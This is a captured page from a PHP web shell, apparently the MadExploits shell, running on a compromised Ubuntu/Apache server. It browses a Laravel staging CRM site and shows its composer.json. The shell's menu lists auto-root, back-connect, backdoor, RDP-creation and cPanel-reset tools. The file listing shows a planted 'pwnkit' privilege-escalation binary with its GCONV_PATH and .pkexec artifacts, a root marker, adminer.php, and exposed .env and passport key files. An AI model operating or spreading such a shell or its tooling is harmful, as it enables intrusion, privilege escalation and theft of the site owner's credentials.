Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.115.13
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
stagingcrm.oxopackaging.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxr-xr-x
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
databases
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
docker
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxrwxr-x
stubs
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.editorconfig
258
B
-rw-r--r--
.env
979
B
-rw-r--r--
.gitattributes
111
B
-rw-r--r--
.gitignore
259
B
-rw-r--r--
.htaccess
1.86
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.rnd
1
KB
-rw-r--r--
.styleci.yml
181
B
-rw-r--r--
N.webp
5.33
KB
-rw-r--r--
README.md
3.76
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
artisan
1.65
KB
-rw-r--r--
composer.json
2.56
KB
-rw-r--r--
composer.lock
399.41
KB
-rw-r--r--
firebase-messaging-sw.js
1.4
KB
-rw-r--r--
package.json
1.24
KB
-rw-r--r--
passport keys.txt
181
B
-rw-r--r--
phpunit.xml
1.17
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
sail
10.45
KB
-rw-r--r--
server.php
563
B
-rw-r--r--
sw.js
1010
B
-rw-r--r--
webpack.mix.js
556
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "laravel/laravel", "type": "project", "description": "The Laravel Framework.", "keywords": ["framework", "laravel"], "license": "MIT", "require": { "php": "^7.3|^8.0", "barryvdh/laravel-dompdf": "^2.0", "barryvdh/laravel-snappy": "^1.0", "dompdf/dompdf": "^2.0", "fideloper/proxy": "^4.4", "fruitcake/laravel-cors": "^2.0", "guzzlehttp/guzzle": "^7.0.1", "jenssegers/agent": "^2.6", "laravel/framework": "^8.54", "laravel/passport": "10.4.1", "laravel/sanctum": "^2.15", "laravel/tinker": "^2.5", "laravel/ui": "^3.4", "league/fractal": "^0.19.2", "maatwebsite/excel": "^3.1", "phenx/php-font-lib": "^0.5.6", "prettus/l5-repository": "^2.7", "rats/zkteco": "^002.0", "spatie/laravel-fractal": "^5.8", "spatie/laravel-permission": "^4.2", "spatie/laravel-query-builder": "^4.0", "tecnickcom/tcpdf": "^6.7", "torann/geoip": "^3.0", "yajra/laravel-datatables-oracle": "^9.18", "yoeunes/toastr": "^1.2" }, "require-dev": { "facade/ignition": "^2.5", "fakerphp/faker": "^1.9.1", "laravel/sail": "^1.0.1", "mockery/mockery": "^1.4.2", "nunomaduro/collision": "^5.0", "phpunit/phpunit": "^9.3.3" }, "autoload": { "psr-4": { "App\\": "app/", "Database\\Factories\\": "database/factories/", "Database\\Seeders\\": "database/seeders/" }, "files" : [ "app/Utils/Helpers.php", "app/Utils/OpeningHours.php", "app/Helpers/helpers.php" ] }, "autoload-dev": { "psr-4": { "Tests\\": "tests/" } }, "scripts": { "post-autoload-dump": [ "Illuminate\\Foundation\\ComposerScripts::postAutoloadDump", "@php artisan package:discover --ansi" ], "post-update-cmd": [ "@php artisan vendor:publish --tag=laravel-assets --ansi" ], "post-root-package-install": [ "@php -r \"file_exists('.env') || copy('.env.example', '.env');\"" ], "post-create-project-cmd": [ "@php artisan key:generate --ansi" ] }, "extra": { "laravel": { "dont-discover": [] } }, "config": { "optimize-autoloader": true, "preferred-install": "dist", "sort-packages": true }, "minimum-stability": "dev", "prefer-stable": true }
Close